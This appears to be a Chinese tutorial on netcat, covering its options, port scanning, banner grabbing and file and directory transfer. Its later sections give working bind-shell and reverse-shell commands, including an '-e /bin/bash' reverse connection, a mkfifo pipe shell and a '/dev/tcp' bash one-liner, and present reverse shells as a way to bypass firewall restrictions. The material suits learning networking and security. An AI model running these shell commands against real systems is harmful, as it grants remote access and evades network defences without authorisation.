nc是netcat的简写,有着网络界瑞士军刀的美誉。
它的主要作用如下:
1) 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定的端口
2) 端口的扫描,nc可以作为client发起TCP或UDP连接
3) 机器之间传输文件
4) 机器之间网络测速
命令格式及参数:
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l port
[-options] [hostname] [port]
- -g<网关>:设置路由器跃程通信网关,最多设置8个;
- -G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
- -h:在线帮助;
- -i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
- -l:使用监听模式,监控传入的资料;
- -n:直接使用ip地址,而不通过域名服务器;
- -o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
- -p<通信端口>:设置本地主机使用的通信端口;
- -r:指定源端口和目的端口都进行随机的选择;
- -s<来源位址>:设置本地主机送出数据包的IP地址;
- -u:使用UDP传输协议;
- -v:显示指令执行过程;
- -w<超时秒数>:设置等待连线的时间;
- -z:使用0输入/输出模式,只在扫描通信端口时使用。
具体使用场景:
1)连接远程主机
连接到远程主机:
$nc -nvv 192.168.x.x 80
连到192.168.x.x的TCP80端口.
监听本地主机:
$nc -l 80
监听本机的TCP80端口.
超时控制:
多数情况我们不希望连接一直保持,那么我们可以使用 -w 参数来指定连接的空闲超时时间,该参数紧接一个数值,代表秒数,如果连接超过指定时间则连接会被终止。
Server
$nc -l 2389
Client
$ nc -w 10 localhost 2389
该连接将在 10 秒后中断。
注意: 不要在服务器端同时使用 -w 和 -l 参数,因为 -w 参数将在服务器端无效果。
2)端口扫描
端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。
$nc -z -v -n 192.168.1.1 21-25
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换.
v 参数指详细输出.
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名.
以上命令会打印21到25 所有开放的端口。
$nc -v 127.0.0.1 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"为Banner信息。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner.一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。
3)文件传输
大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端.
Server
$nc -l 20000 < file.txt
Client
$nc -n 192.168.1.1 20000 > file.txt
这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。
在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.
没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。
B作为Server
Server
$nc -l 20000 > file.txt
Client
$nc 192.168.1.2 20000 < file.txt
4)目录传输
####4.目录传输
发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。
如果你想要通过网络传输一个目录从A到B。
Server
$tar -cvf – dir_name | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | tar -xvf -
这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。
在客户端我们下载该压缩包通过netcat 管道然后打开文件。
如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 20000
通过bzip2压缩
Client
$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -
5)打开一个shell
我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。
假设你的netcat支持 -c -e 参数(原生 netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
$nc 192.168.1.1 20000
这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口20000上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单连接到服务器
Client
$nc -n 192.168.1.1 20000
你会得到一个shell提示符在客户端
6)反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。
Server
$nc -l 20000
在客户端,简单地告诉netcat在连接完成后,执行shell。
Client
$nc 192.168.1.1 20000 -e /bin/bash
现在,什么是反向shell的特别之处呢
反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.1,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。
7)禁用-i,-e等参数时打开一个shell
Server
Nc –vv –l –p 9999
Client
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
8)指定源地址
假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。
Server
$nc -u -l 20000 < file.txt
Client
$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt
该命令将绑定地址172.31.100.5。
以上为nc的一些常见的命令